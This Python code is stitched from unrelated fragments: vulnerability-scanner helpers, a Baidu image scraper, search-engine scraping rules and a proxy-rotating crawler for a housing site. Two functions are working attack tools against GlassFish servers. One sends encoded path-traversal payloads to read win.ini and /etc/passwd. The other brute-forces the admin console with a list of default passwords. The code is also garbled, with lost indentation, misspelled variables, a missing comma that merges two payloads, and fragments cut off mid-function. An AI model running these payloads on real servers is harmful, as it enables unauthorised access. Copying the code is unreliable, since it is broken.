def request_post(self, url, params, data, flag, success_num, username,
password, success, fail, pocs):
try:
headers = {'User-Agent': get_user_agent()}
s = requests.post(url=url + ":" + self.port,
data=data,
headers=headers,
timeout=self.Timeout)
for flag in poc["flag"]:
if flag in s.text:
success_num = success_num + 1
if success_num > 0:
if pocs["admin_bursk"] == True:
self.vuln.append("success url:" + utl + " " + success +
",username:%s password:%s" %
(username, password))
print("success url:" + utl + " " + success +
",username:%s password:%s" % (username, password))
else:
self.vuln.append(success + " \n pocs: \n" + pocs)
print(success + " \n pocs: \n" + pocs)
except Exception:
success_num = success_num + 1
if success_num <= 2:
self.request_post(url, params, data, flag, success_num,
username, password, success, fail, pocs)
def query_baidu(term):
user_agent = get_user_agent()
url = 'https://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word=' + term + '&ct=201326592&v=flip'
r = requests.get(url,
timeout=10,
proxies={
'https': None,
'http': None
},
headers={'User-Agent': user_agent})
urls = re.findall('"objURL":"(.*?)",', r.text, re.S)
return urls
def request_get(self, url, params, data, flags, success_num, success, fail,
pocs):
try:
headers = get_user_agent()
s = requests.get(url=url + ":" + self.port,
params=params,
headers=headers,
timeout=self.Timeout)
if not flags:
if s.status_code != 404:
self.vuln.append(self.url + success)
for flag in flags:
if flag in s.text:
success_num = success_num + 1
if success_num > 0:
self.vuln.append(success + " \npocs: \n" + pocs)
print(success + " \npocs: \n" + pocs)
except Exception:
success_num = success_num + 1
if success_num <= 2:
self.request_get(url, params, data, flags, success_num,
success, fail, pocs)
def glassfish_Directory_traversal(url):
#https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
try:
headers = {'User-Agent': get_user_agent()}
poc = [
"/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
"/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
"/theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
"/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
"/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini",
"/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"
"/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/etc/passwd"
]
flag = ["[fonts]", "root"]
for i in poc:
url = url + i
s = requests.get(url=url, headers=headers)
for j in flag:
if j in s.text:
return "exist Directory_traversal vuln"
return "no exist Directory_traversal vuln"
except Exception:
return "no exist Directory_traversal vuln"
def glassfish_weak2(host):
try:
url = "http://%s" % (host)
headers = {'User-Agent': get_user_agent()}
flag_list = [
'Just refresh the page... login will take over',
'GlassFish Console - Common Tasks',
'/resource/common/js/adminjsf.js">', 'Admin Console</title>',
'src="/homePage.jsf"', 'src="/header.jsf"', 'src="/index.jsf"',
'<title>Common Tasks</title>', 'title="Logout from GlassFish'
]
user_list = ['admin']
pass_list = [
'admin', 'glassfish', 'password', 'adminadmin', '123456',
'12345678', '123456789', 'admin123', 'admin888', 'admin1',
'administrator', '8888888', '123123', 'manager', 'root'
]
for user in user_list:
for password in pass_list:
try:
PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % (
user, password)
res = requests.post(url +
'/j_security_check?loginButton=Login',
data=PostStr,
headers=headers)
res_html = res.text
except Exception:
return "no exist index.jsf GlassFish Weak password"
for flag in flag_list:
if flag in res_html:
info = '%s/index.jsf GlassFish Weak password %s:%s' % (
url, user, password)
return 'YES|' + info
return "no exist index.jsf GlassFish Weak password"
except Exception:
return "no exist index.jsf GlassFish Weak password"
scrap_rule=lambda soup:
[(a['href'], a.find('div', class_='organic__url-text').text)
for a in soup
.findAll('a',
class_='organic__url',
attrs={'data-bem': re.compile('^((?!video).)*$')})]),
google=dict(
url_pattern=lambda x: f'https://www.google.com/search?q={x}',
scrap_rule=lambda soup: [(div.a['href'], div.a.h3)
for div in soup.find_all('div', class_='r')]),
other=dict(
scrap_rule=lambda soup: [(a['href'], a.text) for a in soup.find_all(
'a', href=re.compile('^(http|https)://'))]),
)
SEARCH_ENGINE_REQUEST_HEADERS = {'User-Agent': get_user_agent()}
logger = logging.getLogger('scrapper')
def get_search_url(domain, query):
return SCRAPPING_PREFERENCES[domain]['url_pattern'](query)
def get_scrapping_func(domain='other'):
return SCRAPPING_PREFERENCES[domain]['scrap_rule']
def get_links(url, scrapping_rule):
"""Getting search result page html code """
import random
import re
import requests
import xlwt
from user_agent import get_user_agent
from 代理66 import get_ips
book = xlwt.Workbook(encoding='utf-8')
sheet = book.add_sheet("安居客", cell_overwrite_ok=True)
headers = {
'user-agent':
random.choice(get_user_agent()),
'Accept-Encoding':
'gzip, deflate',
'referer':
'https://shanghai.anjuke.com/',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
}
ip_list = get_ips()
##请求网站信息
def req():
response = requests.get('https://sh.fang.anjuke.com/',
headers=headers,
proxies=random.choice(ip_list)) ##加请求头,更换ip,
return response
#解析网站
def crawl():